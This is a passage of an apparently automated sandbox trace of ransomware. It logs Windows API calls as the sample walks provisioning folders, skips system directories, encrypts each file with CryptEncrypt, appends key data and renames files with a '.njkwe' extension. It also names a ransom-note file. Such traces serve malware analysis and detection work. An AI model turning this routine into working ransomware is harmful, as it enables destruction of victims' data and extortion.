0xbe0000 [0077.458] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.458] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.460] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.460] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.460] GetProcessHeap () returned 0xbe0000 [0077.460] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.460] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.460] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.460] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.460] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.460] CloseHandle (hObject=0x43c) returned 1 [0077.460] GetProcessHeap () returned 0xbe0000 [0077.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.460] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0077.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\228__connections_cellular_zain (jordan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\228__connections_cellular_zain (jordan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.461] GetProcessHeap () returned 0xbe0000 [0077.461] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.461] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9086424b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9086424b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9086424b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", cAlternateFileName="229__C~1.PRO")) returned 1 [0077.461] lstrcmpiW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.461] lstrcmpiW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.461] lstrcmpiW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.461] lstrcmpiW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.461] lstrcmpiW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.461] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml") returned 157 [0077.462] StrStrIW (lpFirst="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.462] lstrcmpW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.462] lstrcmpW (lpString1="229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.462] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.462] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\229__connections_cellular_zain (jordan)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.462] GetTickCount () returned 0x1153b31 [0077.462] GetTickCount () returned 0x1153b31 [0077.462] GetTickCount () returned 0x1153b31 [0077.462] GetTickCount () returned 0x1153b31 [0077.462] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.462] GetProcessHeap () returned 0xbe0000 [0077.462] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.462] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.464] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.464] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.464] GetProcessHeap () returned 0xbe0000 [0077.464] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.464] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.464] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.464] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.464] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.464] CloseHandle (hObject=0x43c) returned 1 [0077.464] GetProcessHeap () returned 0xbe0000 [0077.464] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.464] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0077.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\229__connections_cellular_zain (jordan)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\229__Connections_Cellular_Zain (Jordan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\229__connections_cellular_zain (jordan)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.465] GetProcessHeap () returned 0xbe0000 [0077.465] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.465] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x376, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", cAlternateFileName="22__CO~1.PRO")) returned 1 [0077.465] lstrcmpiW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.465] lstrcmpiW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.465] lstrcmpiW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.465] lstrcmpiW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.465] lstrcmpiW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.465] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml") returned 162 [0077.466] StrStrIW (lpFirst="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.466] lstrcmpW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.466] lstrcmpW (lpString1="22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.466] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\22__connections_cellular_telstra (australia)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.466] GetTickCount () returned 0x1153b31 [0077.466] GetTickCount () returned 0x1153b31 [0077.466] GetTickCount () returned 0x1153b31 [0077.466] GetTickCount () returned 0x1153b31 [0077.466] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.466] GetProcessHeap () returned 0xbe0000 [0077.466] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.466] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x376, lpOverlapped=0x0) returned 1 [0077.470] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.470] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x376, lpOverlapped=0x0) returned 1 [0077.470] GetProcessHeap () returned 0xbe0000 [0077.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.470] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.470] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.470] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.470] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.470] CloseHandle (hObject=0x43c) returned 1 [0077.470] GetProcessHeap () returned 0xbe0000 [0077.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.470] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\22__connections_cellular_telstra (australia)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\22__Connections_Cellular_Telstra (Australia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\22__connections_cellular_telstra (australia)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.471] GetProcessHeap () returned 0xbe0000 [0077.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.471] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9086424b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9086424b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9086424b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x341, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", cAlternateFileName="230__C~1.PRO")) returned 1 [0077.471] lstrcmpiW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.471] lstrcmpiW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.471] lstrcmpiW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.471] lstrcmpiW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.471] lstrcmpiW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.471] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml") returned 161 [0077.471] StrStrIW (lpFirst="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.471] lstrcmpW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.471] lstrcmpW (lpString1="230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.471] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\230__connections_cellular_safaricom (kenya)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.472] GetTickCount () returned 0x1153b40 [0077.472] GetTickCount () returned 0x1153b40 [0077.472] GetTickCount () returned 0x1153b40 [0077.472] GetTickCount () returned 0x1153b40 [0077.472] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.472] GetProcessHeap () returned 0xbe0000 [0077.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.472] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x341, lpOverlapped=0x0) returned 1 [0077.477] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.477] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x341, lpOverlapped=0x0) returned 1 [0077.478] GetProcessHeap () returned 0xbe0000 [0077.478] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.478] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.478] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.478] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.478] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.478] CloseHandle (hObject=0x43c) returned 1 [0077.478] GetProcessHeap () returned 0xbe0000 [0077.478] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.478] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\230__connections_cellular_safaricom (kenya)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\230__Connections_Cellular_Safaricom (Kenya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\230__connections_cellular_safaricom (kenya)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.479] GetProcessHeap () returned 0xbe0000 [0077.479] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.479] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9088a4b2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9088a4b2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9088a4b2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", cAlternateFileName="231__C~1.PRO")) returned 1 [0077.479] lstrcmpiW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.479] lstrcmpiW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.479] lstrcmpiW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.479] lstrcmpiW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.479] lstrcmpiW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.479] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml") returned 170 [0077.479] StrStrIW (lpFirst="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.479] lstrcmpW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.479] lstrcmpW (lpString1="231__Connections_Cellular_KTF HSDPA Internet (Korea)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.479] StrCmpNW 